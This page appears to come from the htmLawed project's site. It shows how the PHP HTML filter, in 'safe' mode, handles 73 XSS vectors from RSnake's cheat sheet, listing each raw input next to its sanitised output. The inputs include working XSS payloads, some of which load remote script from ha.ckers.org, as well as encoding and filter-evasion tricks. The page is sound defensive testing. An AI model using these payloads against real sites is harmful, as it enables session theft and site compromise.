PHP Labware internal utilities / htmLawed

HTMLAWED 1.1.7.1 safe mode against RSnake XSS VECTORS

To illustrate the anti-XSS (cross-site scripting) efficiency of htmLawed in 'safe' mode, htmLawed was used to filter text for each of the XSS vector (code) listed on RSnake's XSS cheat sheet (of 31 January 2009).

For each vector, the code is shown for both before and after the filtering. Most vectors obviously designed to exploit HTML markup in the <head> section or in <frame>, <noframe>, or <frameset> elements of web-pages, or those targeting non-HTML content such as Flash movies, PHP interpreters, etc., were not considered as those are outside htmLawed's purview. How htmLawed neutralizes text (e.g., '>' can be removed or converted to an HTML entity) can vary depending on the settings used.

The 'safe' mode means that the $config parameter 'safe' is set to 1, and other parameters to over-ride any of the default parameter values implicitly used because of 'safe' are not specified.

In such cases, 'safe'=>1 is thus equivalent to the following in a $config value:

'comments'=>0, 'cdata'=>0, 'deny_attribute'=>'on*', elements'=>'*-applet-embed-iframe-object-script', 'scheme'=>'href: aim, feed, file, ftp, gopher, http, https, irc, mailto, news, nntp, sftp, ssh, telnet; style: nil; *:file, http, https'

Refer to htmLawed documentation for more about $config.

Note: Security concerns when filtering HTML are defined by many parameters, like trust in a user, or an admin.'s requirement. htmLawed is an HTML filter/processor, and not an anti-XSS tool per se. For instance, just the presence of Javascript code or dynamic CSS expressions in HTML does not mean that the HTML is dangerous. htmLawed certainly can be used with the right settings to remove such HTML code as is shown in the examples below. On this site you can also find more test-cases with XSS or bad HTML code, as well as an htmLawed demo page.

There is also a demo page to test just the anti-XSS ability of htmLawed (in safe mode, with style attribute denied).

1. XSS Locator

About »
Input code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Output code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;

2. XSS Quick Test

About »
Input code »
'';!--"<XSS>=&{()}

Output code »
'';!--"&lt;XSS&gt;=&amp;{()}

3. SCRIPT w/Alert()

About »
Input code »
<SCRIPT>alert('XSS')</SCRIPT>

Output code »
&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;

4. SCRIPT w/Source File

About »
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Output code »
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;

5. SCRIPT w/Char Code

About »
Input code »
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Output code »
&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;

6. DIV background-image 1

About »
Input code »
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

Output code »
<div style="background-image: url(denied:javascript:alert('XSS'))"></div>

7. DIV background-image 2

About »
Input code »
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

Output code »
<div style="background-image: url(denied:&amp;#1;javascript:alert('XSS'))"></div>

8. DIV expression

About »
Input code »
<DIV STYLE="width: expression(alert('XSS'));">

Output code »
<div style="width:  (alert('XSS'));"></div>

9. IFRAME

About »
Input code »
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Output code »
&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;

10. INPUT Image

About »
Input code »
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

Output code »
<input type="image" src="denied:javascript:alert('XSS');" />

11. IMG w/JavaScript Directive

About »
Input code »
<IMG SRC="javascript:alert('XSS');">

Output code »
<img src="denied:javascript:alert('XSS');" alt="image" />

12. IMG No Quotes/Semicolon

About »
Input code »
<IMG SRC=javascript:alert('XSS')>

Output code »
<img src="denied:javascript:alert(" alt="image" />

13. IMG Dynsrc

About »
Input code »
<IMG DYNSRC="javascript:alert('XSS');">

Output code »
<img src="src" alt="image" />

14. IMG Lowsrc

About »
Input code »
<IMG LOWSRC="javascript:alert('XSS');">

Output code »
<img src="src" alt="image" />

15. IMG Embedded commands 1

About »
Input code »
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

Output code »
<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />

16. IMG Embedded commands 2

About »
Input code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

Output code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser

17. IMG STYLE w/expression

About »
Input code »
exp/*<XSS STYLE='no\xss:noxss("*//*");¬
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

Output code »
exp/*&lt;XSS STYLE='no\xss:noxss("*//*");¬
xss:&#101;x&#x2f;*XSS*//*/*/pression(alert("XSS"))'&gt;

18. IMG w/VBscript

About »
Input code »
<IMG SRC='vbscript:msgbox("XSS")'>

Output code »
<img src="denied:vbscript:msgbox(&quot;XSS&quot;)" alt="image" />

19. LAYER

About »
Input code »
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

Output code »
&lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;

20. Livescript

About »
Input code »
<IMG SRC="livescript:[code]">

Output code »
<img src="denied:livescript:[code]" alt="image" />

*21. US-ASCII encoding

About »
Input code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

Output code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

22. Mocha

About »
Input code »
<IMG SRC="mocha:[code]">

Output code »
<img src="denied:mocha:[code]" alt="image" />

23. OBJECT

About »
Input code »
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

Output code »
&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&gt;&lt;/OBJECT&gt;

24. OBJECT w/Embedded XSS

About »
Input code »
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

Output code »
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;<param name="url" value="javascript:alert(" />&lt;/OBJECT&gt;

25. Embed Flash

About »
Input code »
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

Output code »
&lt;EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;

*26. OBJECT w/Flash 2

About »
Input code »
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";¬
eval(a+b+c+d);

Output code »
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";¬
eval(a+b+c+d);

27. STYLE

About »
Input code »
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

Output code »
&lt;STYLE TYPE="text/javascript"&gt;alert('XSS');&lt;/STYLE&gt;

28. STYLE w/Comment

About »
Input code »
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

Output code »
<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />

29. STYLE w/Anonymous HTML

About »
Input code »
<XSS STYLE="xss:expression(alert('XSS'))">

Output code »
&lt;XSS STYLE="xss:expression(alert('XSS'))"&gt;

30. TABLE

About »
Input code »
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>

Output code »
<table></table>

31. TD

About »
Input code »
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>

Output code »
<table>&lt;td&gt;&lt;/td&gt;</table>

32. XML namespace

About »
Input code »
<HTML xmlns:xss>¬
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>

Output code »
&lt;HTML xmlns:xss&gt;¬
&lt;?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"&gt;¬
&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;¬
&lt;/HTML&gt;

33. XML data island w/CDATA

About »
Input code »
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>¬
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>

Output code »
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[cript:alert('XSS');"&gt;]]&gt;¬
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;<span></span>

34. XML data island w/comment

About »
Input code »
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>¬
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

Output code »
&lt;XML ID="xss"&gt;<i><b><img src="src" alt="image" />cript:alert('XSS')"&gt;</b></i>&lt;/XML&gt;¬
<span></span>

35. XML (locally hosted)

About »
Input code »
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>¬
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

Output code »
&lt;XML SRC="http://ha.ckers.org/xsstest.xml" ID=I&gt;&lt;/XML&gt;¬
<span></span>

36. XML HTML+TIME

About »
Input code »
<HTML><BODY>¬
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>

Output code »
&lt;HTML&gt;&lt;BODY&gt;¬
&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;¬
&lt;?import namespace="t" implementation="#default#time2"&gt;¬
&lt;t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt; &lt;/BODY&gt;&lt;/HTML&gt;

37. Commented-out Block

About »
Input code »
<!--[if gte IE 4]>¬
<SCRIPT>alert('XSS');</SCRIPT>¬
<![endif]-->

Output code »
&lt;!--[if gte IE 4]&gt;¬
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;¬
&lt;![endif]--&gt;

38. Rename .js to .jpg

About »
Input code »
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

Output code »
&lt;SCRIPT SRC="http://ha.ckers.org/xss.jpg"&gt;&lt;/SCRIPT&gt;

39. SSI

About »
Input code »
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->

Output code »
&lt;!--#exec cmd="/bin/echo '&lt;SCRIPT SRC'"--&gt;&lt;!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'"--&gt;

40. PHP

About »
Input code »
<? echo('<SCR)';¬
echo('IPT>alert("XSS")</SCRIPT>'); ?>

Output code »
&lt;? echo('&lt;SCR)';¬
echo('IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'); ?&gt;

41. JavaScript Includes

About »
Input code »
<BR SIZE="&{alert('XSS')}">

Output code »
<br />

42. Case Insensitive

About »
Input code »
<IMG SRC=JaVaScRiPt:alert('XSS')>

Output code »
<img src="denied:JaVaScRiPt:alert(" alt="image" />

43. HTML Entities

About »
Input code »
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

Output code »
<img src="denied:javascript:alert(&quot;XSS&quot;)" alt="image" />

44. Grave Accents

About »
Input code »
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Output code »
<img src="`javascript:alert(" alt="image" />

45. Image w/CharCode

About »
Input code »
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Output code »
<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />

46. UTF-8 Unicode Encoding

About »
Input code »
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Output code »
<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" />

47. Long UTF-8 Unicode w/out Semicolons

About »
Input code »
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

Output code »
<img src="&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041" alt="image" />

48. DIV w/Unicode

About »
Input code »
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

Output code »
<div style="background-image:\007 07 06 028'\006 06 07 06 07 06 07 06 07 07 03 06 06 06 07 07 028.102 058.105 05 02 029'\0029"></div>

49. Hex Encoding w/out Semicolons

About »
Input code »
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

Output code »
<img src="&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29" alt="image" />

50. Embedded Tab

About »
Input code »
<IMG SRC="jav    ascript:alert('XSS');">

Output code »
<img src="denied:jav ascript:alert('XSS');" alt="image" />

51. Embedded Encoded Tab

About »
Input code »
<IMG SRC="jav&#x09;ascript:alert('XSS');">

Output code »
<img src="denied:jav&#x9;ascript:alert('XSS');" alt="image" />

52. Embedded Newline

About »
Input code »
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

Output code »
<img src="denied:jav&#xa;ascript:alert('XSS');" alt="image" />

53. Embedded Carriage Return

About »
Input code »
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

Output code »
<img src="denied:jav&#xd;ascript:alert('XSS');" alt="image" />

54. Multiline w/Carriage Returns

About »
Input code »
<IMG¬
SRC¬
=¬
"¬
j¬
a¬
v¬
a¬
s¬
c¬
r¬
i¬
p¬
t¬
:¬
a¬
l¬
e¬
r¬
t¬
(¬
'¬
X¬
S¬
S¬
'¬
)¬
"¬
>

Output code »
<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />

55. Spaces/Meta Chars

About »
Input code »
<IMG SRC=" &#14;  javascript:alert('XSS');">

Output code »
<img src="denied:&amp;#14;  javascript:alert('XSS');" alt="image" />

56. Non-Alpha/Non-Digit

About »
Input code »
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Output code »
&lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;

57. Non-Alpha/Non-Digit Part 2

About »
Input code »
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

Output code »
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;

58. No Closing Script Tag

About »
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js

Output code »
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js

59. Protocol resolution in script tags

About »
Input code »
<SCRIPT SRC=//ha.ckers.org/.j>

Output code »
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;

60. Half-Open HTML/JavaScript

About »
Input code »
<IMG SRC="javascript:alert('XSS')"

Output code »
&lt;IMG SRC="javascript:alert('XSS')"

61. Double open angle brackets

About »
Input code »
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <

Output code »
&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;

62. Extraneous Open Brackets

About »
Input code »
<<SCRIPT>alert("XSS");//<</SCRIPT>

Output code »
&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;

63. Malformed IMG Tags

About »
Input code »
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

Output code »
<img src="src" alt="image" />&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;

64. No Quotes/Semicolons

About »
Input code »
<SCRIPT>a=/XSS/¬
alert(a.source)</SCRIPT>

Output code »
&lt;SCRIPT&gt;a=/XSS/¬
alert(a.source)&lt;/SCRIPT&gt;

65. Evade Regex Filter 1

About »
Input code »
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Output code »
&lt;SCRIPT a="&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;

66. Evade Regex Filter 2

About »
Input code »
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Output code »
&lt;SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;

67. Evade Regex Filter 3

About »
Input code »
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Output code »
&lt;SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;

68. Evade Regex Filter 4

About »
Input code »
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Output code »
&lt;SCRIPT "a='&gt;'" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;

69. Evade Regex Filter 5

About »
Input code »
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Output code »
&lt;SCRIPT a=`&gt;` SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;

70. Filter Evasion 1

About »
Input code »
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Output code »
&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;

71. Filter Evasion 2

About »
Input code »
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Output code »
&lt;SCRIPT a="&gt;'&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;

72. Mixed Encoding

About »
Input code »
<A HREF="h¬
tt    p://6&#09;6.000146.0x7.147/">XSS</A>

Output code »
<a href="denied:h tt p://6&#9;6.000146.0x7.147/">XSS</a>

73. JavaScript Link Location

About »
Input code »
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Output code »
<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>

htmLawed | PHP Labware home | visitors since 23 Oct'11
PHP HTML filter PHP Anti-XSS Class - HTML purify PHP - XSS library - PHP HTML purification - HTM purify - PHP sanitize class - anti XSS input filter - HTML standards compliance - PHP balance tags - HTML tag balance - PHP filter script. PHP filter library. HTMLPurifier comparison HTML purifier. Filter tags attributes elements XHTML spec specs standards. White-list black list tags. W3C specs